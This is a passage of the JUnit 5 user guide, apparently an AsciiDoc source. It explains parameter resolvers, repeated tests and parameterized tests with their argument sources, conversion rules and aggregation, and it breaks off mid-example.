If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `{RepetitionInfoParameterResolver}`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`,\n the `TestReporterParameterResolver` will supply an instance of `TestReporter`. The\n `TestReporter` can be used to publish additional data about the current test run. The\n data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and\n thus be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where you used to print information to\n`stdout` or `stderr` in JUnit 4. Using `@RunWith(JUnitPlatform.class)` will even output\nall reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{RandomParametersExtension}` for an example of a custom\n`{ParameterResolver}`. While not intended to be production-ready, it demonstrates the\nsimplicity and expressiveness of both the extension model and the parameter resolution\nprocess. 
`MyRandomParametersTest` demonstrates how to inject random values into `@Test`\nmethods.\n\n[source,java,indent=0]\n----\n@ExtendWith(RandomParametersExtension.class)\nclass MyRandomParametersTest {\n\n\t@Test\n\tvoid injectsInteger(@Random int i, @Random int j) {\n\t\tassertNotEquals(i, j);\n\t}\n\n\t@Test\n\tvoid injectsDouble(@Random double d) {\n\t\tassertEquals(0.0, d, 1.0);\n\t}\n\n}\n----\n\nFor real-world use cases, check out the source code for the `{MockitoExtension}` and the\n`{SpringExtension}`.\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the test interface or test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsForPalindromes()]\nINFO example.TimingExtension - Method [dynamicTestsForPalindromes] took 19 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsForPalindromes()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. 
Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. The following placeholders are currently supported.\n\n- `{displayName}`: display name of the `@RepeatedTest` method\n- `{currentRepetition}`: the current repetition count\n- `{totalRepetitions}`: the total number of repetitions\n\nThe default display name for a given repetition is generated based on the following\npattern: `\"repetition {currentRepetition} of {totalRepetitions}\"`. Thus, the display\nnames for individual repetitions of the previous `repeatedTest()` example would be:\n`repetition 1 of 10`, `repetition 2 of 10`, etc. If you would like the display name of\nthe `@RepeatedTest` method included in the name of each repetition, you can define your\nown custom pattern or use the predefined `RepeatedTest.LONG_DISPLAY_NAME` pattern. The\nlatter is equal to `\"{displayName} :: repetition {currentRepetition} of\n{totalRepetitions}\"` which results in display names for individual repetitions like\n`repeatedTest() :: repetition 1 of 10`, `repeatedTest() :: repetition 2 of 10`, etc.\n\nIn order to retrieve information about the current repetition and the total number of\nrepetitions programmatically, a developer can choose to have an instance of\n`RepetitionInfo` injected into a `@RepeatedTest`, `@BeforeEach`, or `@AfterEach` method.\n\n[[writing-tests-repeated-tests-examples]]\n==== Repeated Test Examples\n\nThe `RepeatedTestsDemo` class at the end of this section demonstrates several examples of\nrepeated tests.\n\nThe `repeatedTest()` method is identical to the example from the previous section; whereas,\n`repeatedTestWithRepetitionInfo()` demonstrates how to have an instance of\n`RepetitionInfo` injected into a test to access the total number of repetitions for the\ncurrent repeated test.\n\nThe next two methods demonstrate how to include a custom `@DisplayName` for the\n`@RepeatedTest` method in the display name of each repetition. `customDisplayName()`\ncombines a custom display name with a custom pattern and then uses `TestInfo` to verify\nthe format of the generated display name. `Repeat!` is the `{displayName}` which comes\nfrom the `@DisplayName` declaration, and `1\/1` comes from\n`{currentRepetition}\/{totalRepetitions}`. 
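\n\nA sketch of such a declaration, mirroring the behavior just described (assuming the usual static import of `assertEquals`):\n\n[source,java]\n----\n@RepeatedTest(value = 1, name = \"{displayName} {currentRepetition}\/{totalRepetitions}\")\n@DisplayName(\"Repeat!\")\nvoid customDisplayName(TestInfo testInfo) {\n\tassertEquals(\"Repeat! 1\/1\", testInfo.getDisplayName());\n}\n----\n\n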
In contrast,\n`customDisplayNameWithLongPattern()` uses the aforementioned predefined\n`RepeatedTest.LONG_DISPLAY_NAME` pattern.\n\n`repeatedTestInGerman()` demonstrates the ability to translate display names of repeated\ntests into foreign languages -- in this case German, resulting in names for individual\nrepetitions such as: `Wiederholung 1 von 5`, `Wiederholung 2 von 5`, etc.\n\nSince the `beforeEach()` method is annotated with `@BeforeEach` it will get executed\nbefore each repetition of each repeated test. By having the `TestInfo` and\n`RepetitionInfo` injected into the method, we see that it's possible to obtain\ninformation about the currently executing repeated test. Executing `RepeatedTestsDemo`\nwith the `INFO` log level enabled results in the following output.\n\n....\nINFO: About to execute repetition 1 of 10 for repeatedTest\nINFO: About to execute repetition 2 of 10 for repeatedTest\nINFO: About to execute repetition 3 of 10 for repeatedTest\nINFO: About to execute repetition 4 of 10 for repeatedTest\nINFO: About to execute repetition 5 of 10 for repeatedTest\nINFO: About to execute repetition 6 of 10 for repeatedTest\nINFO: About to execute repetition 7 of 10 for repeatedTest\nINFO: About to execute repetition 8 of 10 for repeatedTest\nINFO: About to execute repetition 9 of 10 for repeatedTest\nINFO: About to execute repetition 10 of 10 for repeatedTest\nINFO: About to execute repetition 1 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 2 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 3 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 4 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 5 of 5 for repeatedTestWithRepetitionInfo\nINFO: About to execute repetition 1 of 1 for customDisplayName\nINFO: About to execute repetition 1 of 1 for customDisplayNameWithLongPattern\nINFO: About to execute repetition 1 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 2 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 3 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 4 of 5 for repeatedTestInGerman\nINFO: About to execute repetition 5 of 5 for repeatedTestInGerman\n....\n\n[source,java]\n----\ninclude::{testDir}\/example\/RepeatedTestsDemo.java[tags=user_guide]\n----\n\nWhen using the `ConsoleLauncher` with the unicode theme enabled, execution of\n`RepeatedTestsDemo` results in the following output to the console.\n\n....\n\u251c\u2500 RepeatedTestsDemo \u2714\n\u2502 \u251c\u2500 repeatedTest() \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 5 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 6 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 7 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 8 of 10 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 9 of 10 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 10 of 10 \u2714\n\u2502 \u251c\u2500 repeatedTestWithRepetitionInfo(RepetitionInfo) \u2714\n\u2502 \u2502 \u251c\u2500 repetition 1 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 2 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 3 of 5 \u2714\n\u2502 \u2502 \u251c\u2500 repetition 4 of 5 \u2714\n\u2502 \u2502 \u2514\u2500 repetition 5 of 5 \u2714\n\u2502 \u251c\u2500 Repeat! \u2714\n\u2502 \u2502 \u2514\u2500 Repeat! 
1\/1 \u2714\n\u2502 \u251c\u2500 Details... \u2714\n\u2502 \u2502 \u2514\u2500 Details... :: repetition 1 of 1 \u2714\n\u2502 \u2514\u2500 repeatedTestInGerman() \u2714\n\u2502 \u251c\u2500 Wiederholung 1 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 2 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 3 von 5 \u2714\n\u2502 \u251c\u2500 Wiederholung 4 von 5 \u2714\n\u2502 \u2514\u2500 Wiederholung 5 von 5 \u2714\n....\n\n\n[[writing-tests-parameterized-tests]]\n=== Parameterized Tests\n\nParameterized tests make it possible to run a test multiple times with different\narguments. They are declared just like regular `@Test` methods but use the\n`{ParameterizedTest}` annotation instead. In addition, you must declare at least one\n_source_ that will provide the arguments for each invocation and then _consume_ the\narguments in the test method.\n\nThe following example demonstrates a parameterized test that uses the `@ValueSource`\nannotation to specify a `String` array as the source of arguments.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=first_example]\n----\n\nWhen executing the above parameterized test method, each invocation will be reported\nseparately. For instance, the `ConsoleLauncher` will print output similar to the\nfollowing.\n\n....\npalindromes(String) \u2714\n\u251c\u2500 [1] racecar \u2714\n\u251c\u2500 [2] radar \u2714\n\u2514\u2500 [3] able was I ere I saw elba \u2714\n....\n\nWARNING: Parameterized tests are currently an _experimental_ feature. Consult the table\nin <<api-evolution-experimental-apis>> for details.\n\n[[writing-tests-parameterized-tests-setup]]\n==== Required Setup\n\nIn order to use parameterized tests you need to add a dependency on the\n`junit-jupiter-params` artifact. Please refer to <<dependency-metadata>> for details.\n\n[[writing-tests-parameterized-tests-consuming-arguments]]\n==== Consuming Arguments\n\nParameterized test methods typically _consume_ arguments directly from the configured\nsource (see <<writing-tests-parameterized-tests-sources>>) following a one-to-one\ncorrelation between argument source index and method parameter index (see examples in\n<<writing-tests-parameterized-tests-sources-CsvSource>>). However, a parameterized test\nmethod may also choose to _aggregate_ arguments from the source into a single object\npassed to the method (see <<writing-tests-parameterized-tests-argument-aggregation>>).\nAdditional arguments may also be provided by a `ParameterResolver` (e.g., to obtain an\ninstance of `TestInfo`, `TestReporter`, etc.). Specifically, a parameterized test method\nmust declare formal parameters according to the following rules.\n\n* Zero or more _indexed arguments_ must be declared first.\n* Zero or more _aggregators_ must be declared next.\n* Zero or more arguments supplied by a `ParameterResolver` must be declared last.\n\nIn this context, an _indexed argument_ is an argument for a given index in the\n`Arguments` provided by an `ArgumentsProvider` that is passed as an argument to the\nparameterized method at the same index in the method's formal parameter list. An\n_aggregator_ is any parameter of type `ArgumentsAccessor` or any parameter annotated with\n`@AggregateWith`.\n\n[[writing-tests-parameterized-tests-sources]]\n==== Sources of Arguments\n\nOut of the box, JUnit Jupiter provides quite a few _source_ annotations. Each of the\nfollowing subsections provides a brief overview and an example for each of them. 
Please\nrefer to the Javadoc in the `{params-provider-package}` package for additional\ninformation.\n\n[[writing-tests-parameterized-tests-sources-ValueSource]]\n===== @ValueSource\n\n`@ValueSource` is one of the simplest possible sources. It lets you specify a single\narray of literal values and can only be used for providing a single argument per\nparameterized test invocation.\n\nThe following types of literal values are supported by `@ValueSource`.\n\n- `short`\n- `byte`\n- `int`\n- `long`\n- `float`\n- `double`\n- `char`\n- `java.lang.String`\n- `java.lang.Class`\n\nFor example, the following `@ParameterizedTest` method will be invoked three times, with\nthe values `1`, `2`, and `3` respectively.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ValueSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-EnumSource]]\n===== @EnumSource\n\n`@EnumSource` provides a convenient way to use `Enum` constants. The annotation provides\nan optional `names` parameter that lets you specify which constants shall be used. If\nomitted, all constants will be used like in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_include_example]\n----\n\nThe `@EnumSource` annotation also provides an optional `mode` parameter that enables\nfine-grained control over which constants are passed to the test method. For example, you\ncan exclude names from the enum constant pool or specify regular expressions as in the\nfollowing examples.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_exclude_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=EnumSource_regex_example]\n----\n\n[[writing-tests-parameterized-tests-sources-MethodSource]]\n===== @MethodSource\n\n`{MethodSource}` allows you to refer to one or more _factory_ methods of the test class\nor external classes.\n\nFactory methods within the test class must be `static` unless the test class is annotated\nwith `@TestInstance(Lifecycle.PER_CLASS)`; whereas, factory methods in external classes\nmust always be `static`. In addition, such factory methods must not accept any arguments.\n\nEach factory method must generate a _stream_ of _arguments_, and each set of arguments\nwithin the stream will be provided as the physical arguments for individual invocations\nof the annotated `@ParameterizedTest` method. Generally speaking this translates to a\n`Stream` of `Arguments` (i.e., `Stream<Arguments>`); however, the actual concrete return\ntype can take on many forms. In this context, a \"stream\" is anything that JUnit can\nreliably convert into a `Stream`, such as `Stream`, `DoubleStream`, `LongStream`,\n`IntStream`, `Collection`, `Iterator`, `Iterable`, an array of objects, or an array of\nprimitives. 
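For orientation, here is a minimal inline sketch of such a factory method returning a
`Stream<Arguments>` -- the class, method, and argument values are illustrative only;
`arguments(...)` is the static factory on the `Arguments` interface described below.

[source,java,indent=0]
----
import java.util.stream.Stream;

import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.Arguments;
import org.junit.jupiter.params.provider.MethodSource;

import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.params.provider.Arguments.arguments;

class ArgumentsStreamSketch {

	@ParameterizedTest
	@MethodSource("additionPairs")
	void addsCorrectly(int augend, int addend, int expectedSum) {
		assertEquals(expectedSum, augend + addend);
	}

	// each arguments(...) entry becomes one invocation of the test method
	static Stream<Arguments> additionPairs() {
		return Stream.of(
			arguments(1, 2, 3),
			arguments(4, 5, 9));
	}
}
----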
The \"arguments\" within the stream can be supplied as an instance of\n`Arguments`, an array of objects (e.g., `Object[]`), or a single value if the\nparameterized test method accepts a single argument.\n\nIf you only need a single parameter, you can return a `Stream` of instances of the\nparameter type as demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_example]\n----\n\nIf you do not explicitly provide a factory method name via `@MethodSource`, JUnit Jupiter\nwill search for a _factory_ method that has the same name as the current\n`@ParameterizedTest` method by convention. This is demonstrated in the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=simple_MethodSource_without_value_example]\n----\n\nStreams for primitive types (`DoubleStream`, `IntStream`, and `LongStream`) are also\nsupported as demonstrated by the following example.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=primitive_MethodSource_example]\n----\n\nIf a parameterized test method declares multiple parameters, you need to return a\ncollection, stream, or array of `Arguments` instances or object arrays as shown below\n(see the Javadoc for `{MethodSource}` for further details on supported return types).\nNote that `arguments(Object...)` is a static factory method defined in the `Arguments`\ninterface. In addition, `Arguments.of(Object...)` may be used as an alternative to\n`arguments(Object...)`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=multi_arg_MethodSource_example]\n----\n\nAn external, `static` _factory_ method can be referenced by providing its _fully\nqualified method name_ as demonstrated in the following example.\n\n[source,java,indent=0]\n----\npackage example;\n\ninclude::{testDir}\/example\/ExternalMethodSourceDemo.java[tags=external_MethodSource_example]\n----\n\n[[writing-tests-parameterized-tests-sources-CsvSource]]\n===== @CsvSource\n\n`@CsvSource` allows you to express argument lists as comma-separated values (i.e.,\n`String` literals).\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvSource_example]\n----\n\n`@CsvSource` uses a single quote `'` as its quote character. See the `'baz, qux'` value\nin the example above and in the table below. An empty, quoted value `''` results in an\nempty `String`; whereas, an entirely _empty_ value is interpreted as a `null` reference.\nAn `ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[cols=\"50,50\"]\n|===\n| Example Input | Resulting Argument List\n\n| `@CsvSource({ \"foo, bar\" })` | `\"foo\"`, `\"bar\"`\n| `@CsvSource({ \"foo, 'baz, qux'\" })` | `\"foo\"`, `\"baz, qux\"`\n| `@CsvSource({ \"foo, ''\" })` | `\"foo\"`, `\"\"`\n| `@CsvSource({ \"foo, \" })` | `\"foo\"`, `null`\n|===\n\n[[writing-tests-parameterized-tests-sources-CsvFileSource]]\n===== @CsvFileSource\n\n`@CsvFileSource` lets you use CSV files from the classpath. 
Each line from a CSV file\nresults in one invocation of the parameterized test.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=CsvFileSource_example]\n----\n\n[source,csv,indent=0]\n.two-column.csv\n----\ninclude::{testResourcesDir}\/two-column.csv[]\n----\n\nNOTE: In contrast to the syntax used in `@CsvSource`, `@CsvFileSource` uses a double\nquote `\"` as the quote character. See the `\"United States of America\"` value in the\nexample above. An empty, quoted value `\"\"` results in an empty `String`; whereas, an\nentirely _empty_ value is interpreted as a `null` reference. An\n`ArgumentConversionException` is raised if the target type of a `null` reference is a\nprimitive type.\n\n[[writing-tests-parameterized-tests-sources-ArgumentsSource]]\n===== @ArgumentsSource\n\n`@ArgumentsSource` can be used to specify a custom, reusable `ArgumentsProvider`. Note\nthat an implementation of `ArgumentsProvider` must be declared as either a top-level\nclass or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsSource_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=ArgumentsProvider_example]\n----\n\n\n[[writing-tests-parameterized-tests-argument-conversion]]\n==== Argument Conversion\n\n[[writing-tests-parameterized-tests-argument-conversion-widening]]\n===== Widening Conversion\n\nJUnit Jupiter supports\nhttps:\/\/docs.oracle.com\/javase\/specs\/jls\/se8\/html\/jls-5.html#jls-5.1.2[Widening Primitive\nConversion] for arguments supplied to a `@ParameterizedTest`. For example, a\nparameterized test annotated with `@ValueSource(ints = { 1, 2, 3 })` can be declared to\naccept not only an argument of type `int` but also an argument of type `long`, `float`,\nor `double`.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit]]\n===== Implicit Conversion\n\nTo support use cases like `@CsvSource`, JUnit Jupiter provides a number of built-in\nimplicit type converters. 
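As a minimal sketch of what this enables (a hypothetical test, not part of the bundled
demo sources), the `String` tokens from a `@CsvSource` can be consumed directly as `int`
and `boolean` parameters:

[source,java,indent=0]
----
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.provider.CsvSource;

import static org.junit.jupiter.api.Assertions.assertEquals;

class ImplicitConversionSketch {

	@ParameterizedTest
	@CsvSource({ "1, true", "2, false" })
	void convertsCsvTokens(int number, boolean odd) {
		// "1" -> 1 and "true" -> true via implicit conversion
		assertEquals(odd, number % 2 == 1);
	}
}
----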
The conversion process depends on the declared type of each\nmethod parameter.\n\nFor example, if a `@ParameterizedTest` declares a parameter of type `TimeUnit` and the\nactual type supplied by the declared source is a `String`, the string will be\nautomatically converted into the corresponding `TimeUnit` enum constant.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_conversion_example]\n----\n\n`String` instances are implicitly converted to the following target types.\n\nNOTE: Decimal, hexadecimal, and octal `String` literals will be converted to their\nintegral types: `byte`, `short`, `int`, `long`, and their boxed counterparts.\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-table]]\n[cols=\"10,90\"]\n|===\n| Target Type | Example\n\n| `boolean`\/`Boolean` | `\"true\"` -> `true`\n| `byte`\/`Byte` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(byte) 15`\n| `char`\/`Character` | `\"o\"` -> `'o'`\n| `short`\/`Short` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `(short) 15`\n| `int`\/`Integer` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15`\n| `long`\/`Long` | `\"15\"`, `\"0xF\"`, or `\"017\"` -> `15L`\n| `float`\/`Float` | `\"1.0\"` -> `1.0f`\n| `double`\/`Double` | `\"1.0\"` -> `1.0d`\n| `Enum` subclass | `\"SECONDS\"` -> `TimeUnit.SECONDS`\n| `java.io.File` | `\"\/path\/to\/file\"` -> `new File(\"\/path\/to\/file\")`\n| `java.lang.Class` | `\"java.lang.Integer\"` -> `java.lang.Integer.class` _(use `$` for nested classes, e.g. `\"java.lang.Thread$State\"`)_\n| `java.lang.Class` | `\"byte\"` -> `byte.class` _(primitive types are supported)_\n| `java.lang.Class` | `\"char[]\"` -> `char[].class` _(array types are supported)_\n| `java.math.BigDecimal` | `\"123.456e789\"` -> `new BigDecimal(\"123.456e789\")`\n| `java.math.BigInteger` | `\"1234567890123456789\"` -> `new BigInteger(\"1234567890123456789\")`\n| `java.net.URI` | `\"http:\/\/junit.org\/\"` -> `URI.create(\"http:\/\/junit.org\/\")`\n| `java.net.URL` | `\"http:\/\/junit.org\/\"` -> `new URL(\"http:\/\/junit.org\/\")`\n| `java.nio.charset.Charset` | `\"UTF-8\"` -> `Charset.forName(\"UTF-8\")`\n| `java.nio.file.Path` | `\"\/path\/to\/file\"` -> `Paths.get(\"\/path\/to\/file\")`\n| `java.time.Instant` | `\"1970-01-01T00:00:00Z\"` -> `Instant.ofEpochMilli(0)`\n| `java.time.LocalDateTime` | `\"2017-03-14T12:34:56.789\"` -> `LocalDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000)`\n| `java.time.LocalDate` | `\"2017-03-14\"` -> `LocalDate.of(2017, 3, 14)`\n| `java.time.LocalTime` | `\"12:34:56.789\"` -> `LocalTime.of(12, 34, 56, 789_000_000)`\n| `java.time.OffsetDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `OffsetDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.OffsetTime` | `\"12:34:56.789Z\"` -> `OffsetTime.of(12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.time.YearMonth` | `\"2017-03\"` -> `YearMonth.of(2017, 3)`\n| `java.time.Year` | `\"2017\"` -> `Year.of(2017)`\n| `java.time.ZonedDateTime` | `\"2017-03-14T12:34:56.789Z\"` -> `ZonedDateTime.of(2017, 3, 14, 12, 34, 56, 789_000_000, ZoneOffset.UTC)`\n| `java.util.Currency` | `\"JPY\"` -> `Currency.getInstance(\"JPY\")`\n| `java.util.Locale` | `\"en\"` -> `new Locale(\"en\")`\n| `java.util.UUID` | `\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\"` -> `UUID.fromString(\"d043e930-7b3b-48e3-bdbe-5a3ccfb833db\")`\n|===\n\n[[writing-tests-parameterized-tests-argument-conversion-implicit-fallback]]\n====== Fallback String-to-Object Conversion\n\nIn addition to implicit conversion from strings to the target 
types listed in the above\ntable, JUnit Jupiter also provides a fallback mechanism for automatic conversion from a\n`String` to a given target type if the target type declares exactly one suitable _factory\nmethod_ or a _factory constructor_ as defined below.\n\n- __factory method__: a non-private, `static` method declared in the target type that\n accepts a single `String` argument and returns an instance of the target type. The name\n of the method can be arbitrary and need not follow any particular convention.\n- __factory constructor__: a non-private constructor in the target type that accepts a\n single `String` argument. Note that the target type must be declared as either a\n top-level class or as a `static` nested class.\n\nNOTE: If multiple _factory methods_ are discovered, they will be ignored. If a _factory\nmethod_ and a _factory constructor_ are discovered, the factory method will be used\ninstead of the constructor.\n\nFor example, in the following `@ParameterizedTest` method, the `Book` argument will be\ncreated by invoking the `Book.fromTitle(String)` factory method and passing `\"42 Cats\"`\nas the title of the book.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=implicit_fallback_conversion_example_Book]\n----\n\n[[writing-tests-parameterized-tests-argument-conversion-explicit]]\n===== Explicit Conversion\n\nInstead of relying on implicit argument conversion you may explicitly specify an\n`ArgumentConverter` to use for a certain parameter using the `@ConvertWith` annotation\nlike in the following example. Note that an implementation of `ArgumentConverter` must be\ndeclared as either a top-level class or as a `static` nested class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example]\n----\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_conversion_example_ToStringArgumentConverter]\n----\n\nExplicit argument converters are meant to be implemented by test and extension authors.\nThus, `junit-jupiter-params` only provides a single explicit argument converter that may\nalso serve as a reference implementation: `JavaTimeArgumentConverter`. It is used via the\ncomposed annotation `JavaTimeConversionPattern`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/ParameterizedTestDemo.java[tags=explicit_java_time_converter]\n----\n\n[[writing-tests-parameterized-tests-argument-aggregation]]\n==== Argument Aggregation\n\nBy default, each _argument_ provided to a `@ParameterizedTest` method corresponds to a\nsingle method parameter. Consequently, argument sources which are expected to supply a\nlarge number of arguments can lead to large method signatures.\n\nIn such cases, an `{ArgumentsAccessor}` can be used instead of multiple parameters. Using\nthis API, you can access the provided arguments through a single argument passed to your\ntest method. 
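For illustration, a minimal sketch (hypothetical names) that reads three CSV columns
through a single `ArgumentsAccessor` parameter instead of three separate method
parameters:

[source,java,indent=0]
----
import org.junit.jupiter.params.ParameterizedTest;
import org.junit.jupiter.params.aggregator.ArgumentsAccessor;
import org.junit.jupiter.params.provider.CsvSource;

import static org.junit.jupiter.api.Assertions.assertEquals;

class ArgumentsAccessorSketch {

	@ParameterizedTest
	@CsvSource({ "Jane, Doe, 1980" })
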